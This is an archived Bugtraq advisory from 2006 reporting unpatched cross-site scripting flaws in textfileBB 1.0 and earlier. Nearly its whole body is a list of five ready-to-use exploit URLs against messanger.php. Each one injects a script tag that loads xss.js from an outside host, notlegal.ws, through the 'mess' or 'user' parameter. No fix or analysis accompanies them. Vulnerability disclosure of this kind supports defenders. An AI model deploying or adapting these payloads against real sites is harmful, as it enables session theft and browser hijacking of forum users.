Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

textfileBB <= 1.0 Multiple XSS

From: retard () 30gigs com
Date: 8 Mar 2006 03:36:30 -0000
ORIGIONAL: http://notlegal.ws/textfilebbmessanger.txt


        software: textfileBB
        vendors website: http://tfbb.jcink.com/
        versions: <= 1.0
        class: remote
        status: unpatched
        exploit: available
        solution: not available
        discovered by: retard
        risk level: medium

exploit(s):

        http://example.com/messanger.php?mess=%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E
        http://example.com/messanger.php?p=MSN&user=%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E
        http://example.com/messanger.php?p=YIM&user=%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E
        http://example.com/messanger.php?p=ICQ&user=%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E
        
http://example.com/messanger.php?p=AIM&user=%22%3E%3C/head%3E%3Cbody%3E%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/body%3E%3C/html%3E

credit:

        author(s): retard
        email: retard () 30gigs com
Previous By Date Next
Previous By Thread Next

Current thread: